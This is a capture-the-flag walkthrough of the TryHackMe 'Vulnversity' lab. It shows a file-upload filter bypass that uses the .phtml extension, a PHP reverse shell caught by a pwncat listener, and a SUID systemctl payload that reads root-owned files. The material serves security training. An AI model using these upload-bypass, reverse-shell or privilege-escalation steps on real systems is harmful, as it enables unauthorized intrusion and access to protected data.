> For the complete documentation index, see [llms.txt](https://ret2basic.gitbook.io/ctfwriteup/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ret2basic.gitbook.io/ctfwriteup/red-teaming/tcm-linux-privilege-escalation-course/tryhackme-vulnversity-easy.md).

# TryHackMe - Vulnversity (Easy)

## Summary

Gobuster finds a hidden directory `/internal` which has an upload form. The upload form filters `.php` extension, but Burp Intruder finds that `phtml` bypasses the filter. Here we rename `php-reverse-shell.php` to `php-reverse-shell.phtml` and get a www-data shell.

On the victim machine, `/bin/systemctl` is SUID. Using an arbitrary file read payload on GTFOBins, we are able to read `root.txt` without getting a root shell.

## IP

* RHOST: 10.10.64.243
* LHOST: 10.13.12.2

## Nmap

![Nmap](https://i.imgur.com/8sxZIac.png)

## Asset Discovery

Run Gobuster against port 3333:

```bash
gobuster dir -u http://10.10.64.243:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
```

Gobuster finds `/internal`:

![Gobuster](https://i.imgur.com/Et3R5IV.png)

## www-data shell: File Upload with PHP Extension Bypass

There is an upload form in `/internal`:

![/internal](https://i.imgur.com/uhhRjED.png)

Try uploading `php-reverse-shell.php` here. However, this file is not present in the `/internal/uploads` directory:

![Upload failed](https://i.imgur.com/Im4jA19.png)

Perhaps the `.php` file extension is blocked. Brute-force valid file extensions using Burpsuite Intruder. Remember turn off "URL-encode these characters":

![Uncheck "URL-encode these characters"](https://i.imgur.com/KXvB3s0.png)

Make a PHP extension wordlist:

```
.php
.php3
.php4
.php5
.phtml
```

Intruder finds that the only valid extension is `.phtml`:

![.phtml is a valid extension](https://i.imgur.com/GBiPTmt.png)

Rename the PHP reverse shell payload to `php-reverse-shell.phtml` and upload again. This time the file is successfully uploaded:

![Upload succeeds](https://i.imgur.com/rSVbb1S.png)

Start a pwncat listener:

```bash
pwncat-cs :443
```

Trigger the reverse shell payload and get a user shell as `www-data`:

![www-data shell](https://i.imgur.com/s5bfoJ7.png)

### Arbitrary File Read: SUID `/bin/systemctl`

Search for SUID file:

```bash
find / -perm -u=s -type f 2>/dev/null
```

Note that `/bin/systemctl` is SUID:

![/bin/systemctl](https://i.imgur.com/yBRCyfP.png)

GTFOBins has a privesc payload for `systemctl`. Change the payload to `cat /root/root.txt > /tmp/output`:

```bash
$ TF=$(mktemp).service
$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
$ /bin/systemctl link $TF
$ /bin/systemctl enable --now $TF
```

Execute these commands line by line on the victim machine and read the content of `root.txt`:

![root.txt](https://i.imgur.com/APOwY3h.png)
